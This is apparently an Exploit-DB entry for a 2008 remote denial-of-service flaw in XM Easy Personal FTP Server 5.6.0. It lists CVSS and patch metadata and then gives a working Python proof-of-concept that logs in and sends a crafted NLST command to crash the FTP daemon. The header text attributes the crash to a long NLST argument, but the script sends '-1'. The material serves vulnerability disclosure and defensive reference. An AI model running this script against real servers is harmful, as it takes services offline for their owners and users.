XM Easy Personal FTP Server 5.6.0 Remote Denial of Service

vendor:

XM Easy Personal FTP Server

by:

shinnai

8.8

CVSS

HIGH

Denial of Service

CWE

Product Name: XM Easy Personal FTP Server

Affected Version From: 5.6.2000

Affected Version To: 5.6.2000

Patch Exists: YES

Related CWE: N/A

CPE: a:xm_easy_software:xm_easy_personal_ftp_server

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2008

XM Easy Personal FTP Server 5.6.0 Remote Denial of Service

A vulnerability in XM Easy Personal FTP Server 5.6.0 allows remote attackers to cause a denial of service (daemon crash) via a long argument to the NLST command.

Mitigation:

Upgrade to the latest version of XM Easy Personal FTP Server 5.6.0

Source

Exploit-DB raw data:

print "--------------------------------------------------------------"
print "# XM Easy Personal FTP Server 5.6.0 Remote Denial of Service"
print "# url: http://www.dxm2008.com/"
print "# author: shinnai"
print "# mail: shinnai[at]autistici[dot]org"
print "# site: http://www.shinnai.net"
print "--------------------------------------------------------------"

import socket
import time

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
   conn = s.connect(("127.0.0.1",21))
   d = s.recv(1024)
   print "Server <- " + d
   time.sleep(2)

   s.send('USER test\r\n')
   print "Client -> USER: test"
   d = s.recv(1024)
   print "Server <- " + d
   time.sleep(2)

   s.send('PASS test\r\n')
   print "Client -> PASS: test"
   d = s.recv(1024)
   print "Server <- " + d
   time.sleep(2)

   s.send('NLST -1\r\n')
   print "Client -> NSLT: -1"
   d = s.recv(1024)
   print "Server <- " + d
   time.sleep(2)
except:
   print "- Unable to connect. exiting."

# milw0rm.com [2008-10-13]